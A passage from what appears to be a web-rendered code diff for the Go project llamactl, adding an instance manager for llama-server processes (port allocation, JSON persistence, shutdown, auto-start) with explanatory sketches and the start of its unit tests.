@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
 }
 
 // GetLogs retrieves the last n lines of logs from the instance
-func (i *Instance) GetLogs(num_lines int) (string, error) {
+func (i *Process) GetLogs(num_lines int) (string, error) {
 	i.mu.RLock()
 	logFileName := i.logger.logFilePath
 	i.mu.RUnlock()
```
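
`GetLogs` copies the log path under the read lock, then reads the file after releasing it, so a slow read cannot block writers. A minimal sketch of the tail-read half (the real logger's buffering details are not shown in this diff):

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

// tailLines returns the last n lines of the file at path. It keeps a sliding
// window while scanning; very long lines would need a bigger Scanner buffer.
func tailLines(path string, n int) (string, error) {
	f, err := os.Open(path)
	if err != nil {
		return "", err
	}
	defer f.Close()

	lines := make([]string, 0, n)
	scanner := bufio.NewScanner(f)
	for scanner.Scan() {
		lines = append(lines, scanner.Text())
		if len(lines) > n {
			lines = lines[1:]
		}
	}
	return strings.Join(lines, "\n"), scanner.Err()
}

func main() {
	out, err := tailLines("/tmp/test/my-instance.log", 10) // placeholder path
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(out)
}
```
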
```diff
@@ -1,6 +1,6 @@
 //go:build !windows
 
-package llamactl
+package instance
 
 import (
 	"os/exec"
```

```diff
@@ -1,6 +1,6 @@
 //go:build windows
 
-package llamactl
+package instance
 
 import "os/exec"
 
```
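
The two single-line hunks above are the platform-specific files: identical package renames guarded by `//go:build !windows` and `//go:build windows` constraints. The mechanism in miniature, with a hypothetical helper name (`setPlatformProcAttrs` is illustrative, not the repo's identifier):

```go
//go:build !windows

// Lives in a *_unix-style file; a mirror file tagged //go:build windows
// supplies the Windows variant. (Illustrative sketch, not the repo's code.)
package instance

import (
	"os/exec"
	"syscall"
)

// setPlatformProcAttrs is a hypothetical helper: on Unix it places the child
// in its own process group so stop signals can target it cleanly.
func setPlatformProcAttrs(cmd *exec.Cmd) {
	cmd.SysProcAttr = &syscall.SysProcAttr{Setpgid: true}
}
```
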
**pkg/manager/manager.go** (new file, 222 lines)

```diff
@@ -0,0 +1,222 @@
+package manager
+
+import (
+	"encoding/json"
+	"fmt"
+	"llamactl/pkg/config"
+	"llamactl/pkg/instance"
+	"log"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+)
+
+// InstanceManager defines the interface for managing instances of the llama server.
+type InstanceManager interface {
+	ListInstances() ([]*instance.Process, error)
+	CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
+	GetInstance(name string) (*instance.Process, error)
+	UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
+	DeleteInstance(name string) error
+	StartInstance(name string) (*instance.Process, error)
+	StopInstance(name string) (*instance.Process, error)
+	RestartInstance(name string) (*instance.Process, error)
+	GetInstanceLogs(name string) (string, error)
+	Shutdown()
+}
+
+type instanceManager struct {
+	mu              sync.RWMutex
+	instances       map[string]*instance.Process
+	ports           map[int]bool
+	instancesConfig config.InstancesConfig
+}
+
+// NewInstanceManager creates a new instance of InstanceManager.
+func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
+	im := &instanceManager{
+		instances:       make(map[string]*instance.Process),
+		ports:           make(map[int]bool),
+		instancesConfig: instancesConfig,
+	}
+
+	// Load existing instances from disk
+	if err := im.loadInstances(); err != nil {
+		log.Printf("Error loading instances: %v", err)
+	}
+	return im
+}
+
+func (im *instanceManager) getNextAvailablePort() (int, error) {
+	portRange := im.instancesConfig.PortRange
+
+	for port := portRange[0]; port <= portRange[1]; port++ {
+		if !im.ports[port] {
+			im.ports[port] = true
+			return port, nil
+		}
+	}
+
+	return 0, fmt.Errorf("no available ports in the specified range")
+}
+
+// persistInstance saves an instance to its JSON file
+func (im *instanceManager) persistInstance(instance *instance.Process) error {
+	if im.instancesConfig.InstancesDir == "" {
+		return nil // Persistence disabled
+	}
+
+	instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
+	tempPath := instancePath + ".tmp"
+
+	// Serialize instance to JSON
+	jsonData, err := json.MarshalIndent(instance, "", "  ")
+	if err != nil {
+		return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
+	}
+
+	// Write to temporary file first
+	if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
+		return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
+	}
+
+	// Atomic rename
+	if err := os.Rename(tempPath, instancePath); err != nil {
+		os.Remove(tempPath) // Clean up temp file
+		return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
+	}
+
+	return nil
+}
+
+func (im *instanceManager) Shutdown() {
+	im.mu.Lock()
+	defer im.mu.Unlock()
+
+	var wg sync.WaitGroup
+	wg.Add(len(im.instances))
+
+	for name, inst := range im.instances {
+		if !inst.Running {
+			wg.Done() // If instance is not running, just mark it as done
+			continue
+		}
+
+		go func(name string, inst *instance.Process) {
+			defer wg.Done()
+			fmt.Printf("Stopping instance %s...\n", name)
+			// Attempt to stop the instance gracefully
+			if err := inst.Stop(); err != nil {
+				fmt.Printf("Error stopping instance %s: %v\n", name, err)
+			}
+		}(name, inst)
+	}
+
+	wg.Wait()
+	fmt.Println("All instances stopped.")
+}
+
+// loadInstances restores all instances from disk
+func (im *instanceManager) loadInstances() error {
+	if im.instancesConfig.InstancesDir == "" {
+		return nil // Persistence disabled
+	}
+
+	// Check if instances directory exists
+	if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
+		return nil // No instances directory, start fresh
+	}
+
+	// Read all JSON files from instances directory
+	files, err := os.ReadDir(im.instancesConfig.InstancesDir)
+	if err != nil {
+		return fmt.Errorf("failed to read instances directory: %w", err)
+	}
+
+	loadedCount := 0
+	for _, file := range files {
+		if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
+			continue
+		}
+
+		instanceName := strings.TrimSuffix(file.Name(), ".json")
+		instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
+
+		if err := im.loadInstance(instanceName, instancePath); err != nil {
+			log.Printf("Failed to load instance %s: %v", instanceName, err)
+			continue
+		}
+
+		loadedCount++
+	}
+
+	if loadedCount > 0 {
+		log.Printf("Loaded %d instances from persistence", loadedCount)
+		// Auto-start instances that have auto-restart enabled
+		go im.autoStartInstances()
+	}
+
+	return nil
+}
+
+// loadInstance loads a single instance from its JSON file
+func (im *instanceManager) loadInstance(name, path string) error {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return fmt.Errorf("failed to read instance file: %w", err)
+	}
+
+	var persistedInstance instance.Process
+	if err := json.Unmarshal(data, &persistedInstance); err != nil {
+		return fmt.Errorf("failed to unmarshal instance: %w", err)
+	}
+
+	// Validate the instance name matches the filename
+	if persistedInstance.Name != name {
+		return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
+	}
+
+	// Create new inst using NewInstance (handles validation, defaults, setup)
+	inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
+
+	// Restore persisted fields that NewInstance doesn't set
+	inst.Created = persistedInstance.Created
+	inst.Running = persistedInstance.Running
+
+	// Check for port conflicts and add to maps
+	if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
+		port := inst.GetOptions().Port
+		if im.ports[port] {
+			return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
+		}
+		im.ports[port] = true
+	}
+
+	im.instances[name] = inst
+	return nil
+}
+
+// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
+func (im *instanceManager) autoStartInstances() {
+	im.mu.RLock()
+	var instancesToStart []*instance.Process
+	for _, inst := range im.instances {
+		if inst.Running && // Was running when persisted
+			inst.GetOptions() != nil &&
+			inst.GetOptions().AutoRestart != nil &&
+			*inst.GetOptions().AutoRestart {
+			instancesToStart = append(instancesToStart, inst)
+		}
+	}
+	im.mu.RUnlock()
+
+	for _, inst := range instancesToStart {
+		log.Printf("Auto-starting instance %s", inst.Name)
+		// Reset running state before starting (since Start() expects stopped instance)
+		inst.Running = false
+		if err := inst.Start(); err != nil {
+			log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
+		}
+	}
+}
```
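
Callers consume all of this through the `InstanceManager` interface defined at the top of the file. A short usage sketch against that API (paths and the model name are placeholders):

```go
package main

import (
	"log"

	"llamactl/pkg/backends/llamacpp"
	"llamactl/pkg/config"
	"llamactl/pkg/instance"
	"llamactl/pkg/manager"
)

func main() {
	cfg := config.InstancesConfig{
		PortRange:    [2]int{8000, 9000},
		InstancesDir: "/var/lib/llamactl/instances", // non-empty enables JSON persistence
		MaxInstances: 10,
	}

	mgr := manager.NewInstanceManager(cfg) // also reloads persisted instances

	opts := &instance.CreateInstanceOptions{
		LlamaServerOptions: llamacpp.LlamaServerOptions{
			Model: "/models/llama-7b.gguf", // placeholder path
		},
	}

	inst, err := mgr.CreateInstance("llama-7b", opts)
	if err != nil {
		log.Fatalf("create failed: %v", err)
	}

	if _, err := mgr.StartInstance(inst.Name); err != nil {
		log.Fatalf("start failed: %v", err)
	}

	defer mgr.Shutdown() // stops all running instances in parallel
}
```

Worth noting in `persistInstance`: writing to a `.tmp` file and then renaming it over the real path keeps each instance file either fully old or fully new if the process dies mid-write, since `os.Rename` is atomic on POSIX filesystems.
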
892
pkg/manager/manager_test.go
Normal file
892
pkg/manager/manager_test.go
Normal file
@@ -0,0 +1,892 @@
|
|||||||
|
package manager_test
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/json"
|
||||||
|
"llamactl/pkg/backends/llamacpp"
|
||||||
|
"llamactl/pkg/config"
|
||||||
|
"llamactl/pkg/instance"
|
||||||
|
"llamactl/pkg/manager"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"reflect"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestNewInstanceManager(t *testing.T) {
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
LogsDir: "/tmp/test",
|
||||||
|
MaxInstances: 5,
|
||||||
|
LlamaExecutable: "llama-server",
|
||||||
|
DefaultAutoRestart: true,
|
||||||
|
DefaultMaxRestarts: 3,
|
||||||
|
DefaultRestartDelay: 5,
|
||||||
|
}
|
||||||
|
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
if manager == nil {
|
||||||
|
t.Fatal("NewInstanceManager returned nil")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Test initial state
|
||||||
|
instances, err := manager.ListInstances()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ListInstances failed: %v", err)
|
||||||
|
}
|
||||||
|
if len(instances) != 0 {
|
||||||
|
t.Errorf("Expected empty instance list, got %d instances", len(instances))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_Success(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
inst, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if inst.Name != "test-instance" {
|
||||||
|
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
|
||||||
|
}
|
||||||
|
if inst.Running {
|
||||||
|
t.Error("New instance should not be running")
|
||||||
|
}
|
||||||
|
if inst.GetOptions().Port != 8080 {
|
||||||
|
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_DuplicateName(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create first instance
|
||||||
|
_, err := manager.CreateInstance("test-instance", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("First CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Try to create duplicate
|
||||||
|
_, err = manager.CreateInstance("test-instance", options2)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for duplicate instance name")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "already exists") {
|
||||||
|
t.Errorf("Expected duplicate name error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
|
||||||
|
// Create manager with low max instances limit
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
MaxInstances: 2, // Very low limit for testing
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options3 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create instances up to the limit
|
||||||
|
_, err := manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("instance2", options2)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// This should fail due to max instances limit
|
||||||
|
_, err = manager.CreateInstance("instance3", options3)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error when exceeding max instances limit")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
|
||||||
|
t.Errorf("Expected max instances error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_PortAssignment(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Create instance without specifying port
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
inst, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should auto-assign a port in the range
|
||||||
|
port := inst.GetOptions().Port
|
||||||
|
if port < 8000 || port > 9000 {
|
||||||
|
t.Errorf("Expected port in range 8000-9000, got %d", port)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_PortConflictDetection(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080, // Explicit port
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model2.gguf",
|
||||||
|
Port: 8080, // Same port - should conflict
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create first instance
|
||||||
|
_, err := manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Try to create second instance with same port
|
||||||
|
_, err = manager.CreateInstance("instance2", options2)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for port conflict")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
|
||||||
|
t.Errorf("Expected port conflict error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create multiple instances and verify they get different ports
|
||||||
|
instance1, err := manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
instance2, err := manager.CreateInstance("instance2", options2)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
port1 := instance1.GetOptions().Port
|
||||||
|
port2 := instance2.GetOptions().Port
|
||||||
|
|
||||||
|
if port1 == port2 {
|
||||||
|
t.Errorf("Expected different ports, both got %d", port1)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCreateInstance_PortExhaustion(t *testing.T) {
|
||||||
|
// Create manager with very small port range
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 8001}, // Only 2 ports available
|
||||||
|
MaxInstances: 10, // Higher than available ports
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options3 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create instances to exhaust all ports
|
||||||
|
_, err := manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("instance2", options2)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// This should fail due to port exhaustion
|
||||||
|
_, err = manager.CreateInstance("instance3", options3)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error when ports are exhausted")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
|
||||||
|
t.Errorf("Expected port exhaustion error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDeleteInstance_PortRelease(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create instance with specific port
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Delete the instance
|
||||||
|
err = manager.DeleteInstance("test-instance")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("DeleteInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should be able to create new instance with same port
|
||||||
|
_, err = manager.CreateInstance("new-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetInstance_Success(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Create an instance first
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
created, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Retrieve it
|
||||||
|
retrieved, err := manager.GetInstance("test-instance")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if retrieved.Name != created.Name {
|
||||||
|
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetInstance_NotFound(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
_, err := manager.GetInstance("nonexistent")
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for nonexistent instance")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "not found") {
|
||||||
|
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestListInstances(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Initially empty
|
||||||
|
instances, err := manager.ListInstances()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ListInstances failed: %v", err)
|
||||||
|
}
|
||||||
|
if len(instances) != 0 {
|
||||||
|
t.Errorf("Expected 0 instances, got %d", len(instances))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create some instances
|
||||||
|
options1 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
options2 := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("instance1", options1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 1 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err = manager.CreateInstance("instance2", options2)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance 2 failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// List should return both
|
||||||
|
instances, err = manager.ListInstances()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("ListInstances failed: %v", err)
|
||||||
|
}
|
||||||
|
if len(instances) != 2 {
|
||||||
|
t.Errorf("Expected 2 instances, got %d", len(instances))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check names are present
|
||||||
|
names := make(map[string]bool)
|
||||||
|
for _, inst := range instances {
|
||||||
|
names[inst.Name] = true
|
||||||
|
}
|
||||||
|
if !names["instance1"] || !names["instance2"] {
|
||||||
|
t.Error("Expected both instance1 and instance2 in list")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDeleteInstance_Success(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Create an instance
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Delete it
|
||||||
|
err = manager.DeleteInstance("test-instance")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("DeleteInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should no longer exist
|
||||||
|
_, err = manager.GetInstance("test-instance")
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Instance should not exist after deletion")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDeleteInstance_NotFound(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
err := manager.DeleteInstance("nonexistent")
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for deleting nonexistent instance")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "not found") {
|
||||||
|
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestUpdateInstance_Success(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
// Create an instance
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Update it
|
||||||
|
newOptions := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/new-model.gguf",
|
||||||
|
Port: 8081,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
updated, err := manager.UpdateInstance("test-instance", newOptions)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("UpdateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
|
||||||
|
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
|
||||||
|
}
|
||||||
|
if updated.GetOptions().Port != 8081 {
|
||||||
|
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestUpdateInstance_NotFound(t *testing.T) {
|
||||||
|
manager := createTestManager()
|
||||||
|
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
_, err := manager.UpdateInstance("nonexistent", options)
|
||||||
|
if err == nil {
|
||||||
|
t.Error("Expected error for updating nonexistent instance")
|
||||||
|
}
|
||||||
|
if !strings.Contains(err.Error(), "not found") {
|
||||||
|
t.Errorf("Expected 'not found' error, got: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestPersistence_InstancePersistedOnCreation(t *testing.T) {
|
||||||
|
// Create temporary directory for persistence
|
||||||
|
tempDir := t.TempDir()
|
||||||
|
|
||||||
|
cfg := config.InstancesConfig{
|
||||||
|
PortRange: [2]int{8000, 9000},
|
||||||
|
InstancesDir: tempDir,
|
||||||
|
MaxInstances: 10,
|
||||||
|
}
|
||||||
|
manager := manager.NewInstanceManager(cfg)
|
||||||
|
|
||||||
|
options := &instance.CreateInstanceOptions{
|
||||||
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
|
Model: "/path/to/model.gguf",
|
||||||
|
Port: 8080,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create instance
|
||||||
|
_, err := manager.CreateInstance("test-instance", options)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateInstance failed: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check that JSON file was created
|
||||||
|
expectedPath := filepath.Join(tempDir, "test-instance.json")
|
||||||
|
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
|
||||||
|
t.Errorf("Expected persistence file %s to exist", expectedPath)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify file contains correct data
|
||||||
|
data, err := os.ReadFile(expectedPath)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Failed to read persistence file: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var persistedInstance map[string]interface{}
|
||||||
|
if err := json.Unmarshal(data, &persistedInstance); err != nil {
|
||||||
